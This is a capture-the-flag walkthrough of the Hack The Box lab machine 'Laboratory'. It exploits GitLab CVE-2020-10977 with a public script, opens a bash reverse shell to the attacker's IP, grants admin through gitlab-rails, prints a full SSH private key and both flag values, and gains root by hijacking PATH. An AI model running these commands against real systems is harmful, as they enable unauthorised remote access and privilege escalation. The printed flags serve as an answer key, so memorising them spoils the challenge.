Name: | Laboratory |
---|---|
Release Date: | 14 Nov 2020 |
Retire Date: | 17 Apr 2021 |
OS: | Linux |
Base Points: | Easy - Retired [0] |
Rated Difficulty: | |
Radar Graph: | |
wtflink 00 days, 01 hours, 48 mins, 28 seconds | |
jkr 00 days, 02 hours, 02 mins, 10 seconds | |
Creator: | 0xc45 |
Pentest Workstation PDF: | Laboratory.pdf |
Again, we start with sudo /home/kali/AutoRecon/src/autorecon/autorecon.py 10.10.10.216
Sidenote: Newer versions of Kali that do not use root by default require sudo whenever checking UDP ports.
We have SSH (TCP 22), HTTP (TCP 80), HTTPS (TCP 443) that are the major ports that we need to look at right now. To use Gobuster, we'll need to add 10.10.10.216 git.laboratory.htb laboratory.htb to /etc/hosts and Gobuster should find several pages and directories that could be interesting. The -k flag will ignore any pesky TLS errors.
gobuster dir -w /usr/share/seclists/Discovery/Web-Content/common.txt -k -u https://laboratory.htb
┌──(kali㉿kali)-[~/Desktop/HTB/Laboratory]
└─$ gobuster dir -w /usr/share/seclists/Discovery/Web-Content/common.txt -k -u https://laboratory.htb 1 ⨯
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: https://laboratory.htb
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2022/01/17 16:29:30 Starting gobuster in directory enumeration mode
===============================================================
/.htaccess (Status: 403) [Size: 280]
/.hta (Status: 403) [Size: 280]
/.htpasswd (Status: 403) [Size: 280]
/assets (Status: 301) [Size: 319] [--> https://laboratory.htb/assets/]
/images (Status: 301) [Size: 319] [--> https://laboratory.htb/images/]
/index.html (Status: 200) [Size: 7254]
/server-status (Status: 403) [Size: 280]
===============================================================
2022/01/17 16:30:51 Finished
===============================================================
So much for finding interesting files and directories.... Let's navigate to laboratory.htb and git.laboratory.htb and see what we're dealing with.
git.laboratory.htb was a Yahtzee for us. All we need is to Register with a laboratory.htb email address (and hope it doesn't ask for email validation).
Scrolling to the very bottom of the GitLab login, we can see an explore and about buttons that will let us look around without logging in, but everything we need to do requires a login. Register for a login.
Full Name: Neocount Phoenix
Username: Neocount
Email: neocount@laboratory.htb
Email confirmation: neocount@laboratory.htb
Password: <randomly generated>
Searching for Gitlab Community 12.8.1 Vulnerabilities, we stumble across a CVE-2020-10977 and a premade script for exploiting it (git clone https://github.com/dotPY-hax/gitlab_RCE). We run this exploit using:
python3 gitlab_rce.py https://git.laboratory.htb <YOUR TUN0 IP>
Pick Option 2, but be warned, the Ruby shell is INSANELY unstable so have another listener ready and use a bash statement to swap over.
/bin/bash -c 'bash -i >& /dev/tcp/<YOUR TUN0 IP>/1337 0>&1'
and you'll finally receive a stable shell.
Now that we have a stable shell, we can grab the user flag and see what we need to do to escalate privileges. Hostname shows us that we are on git.laboratory.htb, so we're definitely in a docker container that runs the GitLab instance. Crap. That complicates matters, but not enough to discourage us. If GitLab is running in a docker instance, we should be able to turn our registered user into an Admin and see if Dexter is hiding anything inside his projects.
git@git:/$ gitlab-rails console
user = User.find_by(id: 5)
user = User.find_by(id: 5)
#<User id:5 @Neocount>
user.admin = TRUE
user.save!user.admin = TRUE
(irb):23: warning: constant ::TRUE is deprecated
true
user.save!
We can find our ID by looking at the Profile tab.
Notice when you refresh the GitLab page, you'll now see a SecureDocker Project from our friend Dexter! Open it and navigate through and you'll find his private key.
-----BEGIN OPENSSH PRIVATE KEY-----
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
-----END OPENSSH PRIVATE KEY-----
Now we're getting somewhere! Copy the key into an id_rsa file, chmod 400 id_rsa and ssh as dexter using:
ssh -i id_rsa dexter@10.10.10.216
First we grab the user flag, and next we look for privesc possibilities.
dexter@laboratory:~$ cat user.txt
992dca86fc8f873da66b9cbe119d52c2
find / -perm -4000 -type f -exec ls -la {} 2>/dev/null \; | grep dexter
docker-security is the only binary owned by dexter. One of the things that it does is run a chmod. We can easily hijack that by creating our own chmod, adding it to the PATH and running that docker-security binary.
echo "/bin/bash" > chmod
chmod 777 chmod
export PATH=/home/dexter:$PATH
/usr/local/bin/docker-security
root@laboratory:~# cat /root/root.txt
750e11d55d244695477b3e72272ddd36
This one was a PAIN because of all the different methods to exploit the CVE-2020-10977, but we finally found one that works. I tried probably a dozen different ways to do the cookie curl'ing exploit and only this one worked. Glad this one is over and done. Now on to the next!